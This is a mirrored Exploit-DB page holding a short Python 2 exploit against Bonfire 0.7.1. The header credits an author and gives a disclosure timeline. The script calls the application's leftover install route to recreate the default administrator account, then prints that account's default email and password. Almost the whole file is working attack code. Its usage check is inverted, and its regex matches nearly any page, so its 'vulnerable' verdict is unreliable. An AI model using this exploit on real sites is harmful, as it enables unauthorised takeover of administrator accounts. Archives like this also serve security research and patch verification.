bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/32999.py
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

40 lines
No EOL
1.3 KiB
Python
Executable file
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/env python
# coding: utf-8
#
# Bonefire v.0.7.1 Reinstall Admin Account Exploit
#
# Author : Mehmet INCE
#
# Analysis write-up : http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/
#
# Description :
# Forgotten controls lead to call install module which lead to
# create default administrator account again!
#
# TIMELINE
# 21 Apr 2014 14:00 Vulnerability found
# 23 Apr 2014 21:20 Analysis and write-up completed
# 23 Apr 2014 21:29 First contact with lead developer of Bonfire
# 23 Apr 2014 21:33 Response from lead developer
# 23 Apr 2014 21:52 Vulnerability confirmed by lead developer
# 23 Apr 2014 21:55 Vulnerability has been patched via following commit
# https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e
import urllib2
import sys
import re
target = sys.argv[1]
path = sys.argv[2]
if len(sys.argv) > 3:
print "Usage : python bonfire www.target.com /path/"
exit(0)
content = urllib2.urlopen(target+path+"index.php/install/do_install").read()
if re.search('[admin@mybonefire.com]', content):
print "Target is vulnerable!"
print "Username : admin@mybonefire.com"
print "Password : password"
else:
print "Target is not vulnerable..."
Reference in a new issue View git blame Copy permalink